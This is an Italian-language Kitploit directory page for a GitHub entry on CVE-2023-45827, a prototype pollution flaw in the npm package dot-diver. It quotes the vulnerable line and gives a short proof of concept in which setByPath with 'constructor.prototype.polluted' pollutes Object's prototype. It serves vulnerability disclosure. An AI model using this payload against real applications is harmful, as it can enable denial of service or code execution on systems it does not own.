Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-45827 — pp | Kitploit
Strumenti/GitHubGitHub/200101whoami/cve-2023-45827
Analisi StaticaAnalisi delle VulnerabilitàAnalisi del CodiceExploitSicurezza Web
GitHub200101whoami/cve-2023-45827

CVE-2023-45827

pp

Vedi Repository
52 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-45827

Panoramica della vulnerabilità

  • CVE-2023-45827

  • CVSS : 9.8

  • Nov 3, 2023

  • ProtoType Pollution in node.js package

  • Parte del progetto rebob

Descrizione della vulnerabilità

github advisories

This is a Prototype Pollution(PP) vulnerability in dot-diver. It can leads to RCE.

vulnerable code

root@kitploit:~
//https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277
//eslint-disable-next-line @typescript-eslint/no-unsafe-member-access
objectToSet[lastKey] = value

poc

root@kitploit:~
import { getByPath, setByPath } from '@clickbar/dot-diver'

console.log({}.polluted); // undefined
setByPath({},'constructor.prototype.polluted', 'foo');
console.log({}.polluted); // foo

It is Prototype Pollution(PP) and it can leads to Dos, RCE, etc.

target package

Scarica lo strumento